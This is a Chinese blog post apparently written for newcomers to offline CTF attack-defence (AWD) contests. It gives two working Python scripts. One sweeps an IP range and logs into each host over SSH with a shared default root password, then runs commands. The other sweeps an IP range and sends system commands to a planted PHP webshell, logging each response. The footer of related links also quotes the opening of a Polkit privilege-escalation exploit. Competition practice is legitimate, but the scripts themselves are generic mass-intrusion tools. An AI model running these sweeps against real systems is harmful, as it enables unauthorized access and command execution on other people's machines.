信息安全CTF-AWD脚本(小白向)

最新推荐文章于 2024-05-17 09:13:51 发布
最新推荐文章于 2024-05-17 09:13:51 发布
阅读量3.9k 收藏 89
点赞数 14
文章标签: python ssh 信息安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39374987/article/details/105520368
版权

信息安全比赛线下AWD简单python脚本

0x00 ssh批量登录

如果攻防环节所有队伍的服务器密码都一样,这个脚本可以再别人修改密码之前登录对方靶机并拿到flag。也可以执行别的命令例如user add等,具体怎么用,看你发挥了。(有兴趣的还可以自行添加FTP功能)
所以我们在比赛使登录自己服务器的第一时间一定要修改密码,删除多余用户!!!

# coding: utf-8
# author: Qilinge
# version: python-3.7.3
#此脚本适用于全场服务器的初始用户名和密码都一样的情况,在别人修改默认密码之前快速登录别人主机拿到flag
import paramiko
#使用此脚本需安装paramiko库
def catflag(ip):
    try:
        ssh=paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(ip,username='root',password='qilinge',timeout=1)
        #在此处填写比赛方默认的用户名和密码
        stdin,stdout,stderr=ssh.exec_command("cat flag*")
        #此处填写要执行的命令(可以用命令链接符创建用户等操作)
        flag=stdout.readlines()
        f=open('flag.txt','a')
        f.write("ip:%s,flag:%s\n" %(ip,flag))
        #flag.txt记录目标主机的flag
        f.close()
        ssh.close()
        print("打开flag.txt查看flag")
    except:
        print("用户或密码错误!")
        pass
xunhuan = int(input("IP地址第几位循环?"))
if xunhuan==3:
    ip1=input("第一位:")
    ip2=input("第二位:")
    ip4=input("第四位:")
    for ip3 in range(0,254):
        #根据需要自行调节IP范围 range(x,y)
        ip = str(ip1)+"."+str(ip2)+"."+str(ip3)+"."+str(ip4)
        print(ip)
        catflag(ip)
if xunhuan==4:
    ip1=input("第一位:")
    ip2=input("第二位:")
    ip3=input("第三位:")
    for ip4 in range(0,254):
        #根据需要自行调节IP范围 range(x,y)
        ip = str(ip1)+"."+str(ip2)+"."+str(ip3)+"."+str(ip4)
        print(ip)
        catflag(ip)

0x01 预留后门利用

一般大学里的比赛,为了照顾萌新,出题人都会在靶机预留webshell。我们登录靶机后把整个web目录download,丢进在D盾检测。如果检测出webshell,这个脚本就派上用场了!

#coding: utf-8
#author: Qilinge
#version:python-3.7.3
#此脚本适用于比赛环境预留有webshell的情况
import requests
#需安装requests库
muma='/1.php'
#木马路径
password='qilinge'
#木马密码
port=80
payload={password:'system(\'type flag*\');'}
#把 type flag* 换成要执行的命令
def request(url,payload):
    try:
        r=requests.post(url,payload,timeout=1)
        if r.status_code==requests.codes.ok:
            f=open('webshell_flag.txt','a')
            f.write(ip+"  flag is : "+r.text+ "\n")
            f.close()
            print(url+" success! flag is: "+r.text)
        else:
            print(url+" 密码错误或文件不存在!")
    except:
        print(url+" 访问不到主机!!!")

xunhuan=int(input("循环的地址是第几段?(3 or 4)"))
if xunhuan==3:
    ip1=str(input("请输入第一段IP:"))
    ip2=str(input("请输入第二段IP:"))
    ip4=str(input("请输入第四段IP:"))
    for ip3 in range(0,255):
        #range范围内自定义第三段IP范围,根据情况自己调,范围越小效率越高
        ip = str(ip1)+"."+str(ip2)+"."+str(ip3)+"."+str(ip4)
        url=str("http://"+ip + muma)
        request(url,payload)
    print("打开webshell_flag.txt查看flag!!!")
else:
    ip1=str(input("请输入第一段IP:"))
    ip2=str(input("请输入第二段IP:"))
    ip3=str(input("请输入第三段IP:"))
    for ip4 in range(1,255):
        #range范围内自定义第四段IP范围,根据情况自己调,范围越小效率越高
        ip = str(ip1)+"."+str(ip2)+"."+str(ip3)+"."+str(ip4)
        url=str("http://"+ip + muma)
        request(url,payload)
    print("打开webshell_flag.txt查看flag!!!")
我吃烤山药
关注
  • 14
    点赞
  • 89
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AWD脚本收集.rar
10-21
awd必备脚本awd框架 流量监控waf 批量提交 批量获取 批量改密码 文件监控
CTF 线下AWD 一些py脚本
weixin_33698823的博客
06-08 1651
CTF 线下AWD 一些py脚本1、文件监控的脚本#-*-coding:utf-8-*-#use:pythonfile_check.py./importosimporthashlibimportshutilimportntpathimporttime CWD=os.getcwd()FILE_MD5_DICT={}#文件MD5字典...
ctf入门书/CTF-AWD入门手册_详细漏洞入门教程
最新发布
程序员三九的博客
05-17 677
持续创作,加速成长!这是我参与「掘金日新计划 · 10 月更文挑战」的第24天,点击查看活动详情引文AWD赛制是一种网络安全竞赛的赛制。
Bugku线上AWD脚本
Mark的博客
10-27 2596
Bugku手写小脚本(大佬就不用看了,鄙人水平有限) 首先是检测网站存活脚本 import urllib.request import time opener = urllib.request.build_opener() opener.addheaders = [('User-agent', 'Mozilla/49.0.2')] for n in range(1,255): nb = str(n) target = 'http://192-168-1-'+nb+'.awd.bugku
awd中实用的脚本
as you know, nlp is fantasitc!
09-07 1022
【代码】在awd中实用的脚本
Linux Polkit权限提升漏洞复现(CVE-2021-4034)
weixin_45945976的博客
01-26 7540
Linux Polkit权限提升漏洞 CVE-2021-4034 漏洞描述 Qualys 研究团队在 polkit 的 pkexec 中发现了一个内存损坏漏洞,该 SUID 根程序默认安装在每个主要的 Linux 发行版上。这个易于利用的漏洞允许任何非特权用户通过在其默认配置中利用此漏洞来获得易受攻击主机上的完全 root 权限。 漏洞影响 Polkit > 2009 漏洞复现 from ctypes import * from ctypes.util import find_library impo
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
在"CTF-AWD-WEB"中,重点在于Web安全领域,涵盖了各种Web应用漏洞和防护技巧。 本资源"CTF-AWD-WEB"是一个包含了多个AWD模式下Web试题的仓库,这些试题可能来源于不同的CTF线下赛事。通过这些试题,学习者可以深入...
CTF线下AWD脚本合集.zip
03-31
"Prepare-for-AWD-master"是压缩包中的主要文件夹,我们可以推断这可能是一个准备AWD比赛的代码仓库或教程。通常,这样的资源可能包括以下几类内容: 1. **扫描工具**:用于快速发现对手系统的漏洞和开放端口,如...
apachecn#apachecn-ctf-wiki#CTF-AWD靶场搭建和第一题题解_星星明亮的博客-CSDN博客_awd
07-25
1.根据当前队伍数量copy所有的队伍的比赛文件夹: 2.启动比赛: 1.每个队伍分配到一个docker主机,给定ctf用户权限,通过制定的端口和密码进行连接
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛中,可利用该工具自动识别编码类型并解码,快速解决misc类别的密码题目。 其他说明: 该工具具备智能判断密码...
ctf-all-in-one
01-30
ctf-all-in-one
AWD比赛后门通用脚本
10-31
AWD比赛后门通用脚本 改一下IP和密码就好 适用于AWD混战
AWD监控脚本看别人怎么攻击你
09-05
监控的脚本,看别人怎么攻击你的 然后你抓到他的流量去攻击别人
AWD自动提交flag脚本
09-01
AWD自动提交flag脚本
AWD批量拿分python脚本
05-12
根据网上版本修改的,现场更好更改参数的版本,减少AWD比赛时的代码修改量,原始版本是网上公有版本,个人觉得哪个版需要改的参数太多浪费了很多比赛时间,可以提前根据自己shell名称改好速度会更快
AWD攻防比赛 PHP WAF
10-16
AWD攻防比赛 PHP WAF 超强waf,防读flag 比赛用基本可以完美防住
网络信息安全攻防平台脚本
qq_42812036的博客
02-18 442
ctf 平台 快速口算 解题思路: 脚本提交算式计算结果得到flag 附上脚本 import requests s=requests.Session() url='http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php' r=s.get(url) res=r.content a=res.find('&lt...
CTF-线下AWD-py脚本
1cePeak
11-08 1498
文件监控脚本  # -*- coding: utf-8 -*- #use: python file_check.py ./ import os import hashlib import shutil import ntpath import time CWD = os.getcwd() FILE_MD5_DICT = {} # 文件MD5字典 ORIGIN_FILE_LIS...
awd的批量脚本 pwn_北极星杯AWD-Writeup
weixin_39966909的博客
12-20 823
前言祝祖国70周年生日快乐,也祝星盟一周年生日快乐.感谢各位师傅在国庆假期抽出时间参加这次比赛,也感谢负责组织比赛的师傅忙前忙后.我是M09ic,负责本次北极星杯AWD的赛后分享.靠着抱大腿以及足够的运气,很荣幸获得了第二名.感谢小远师傅,sayhi师傅,以及Alkaid师傅大哥大嫂国庆好!!!先贴上web题目源码:因为是先上的waf再做的备份,所以看到waf相关的东西师傅们可以无视...web1...
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值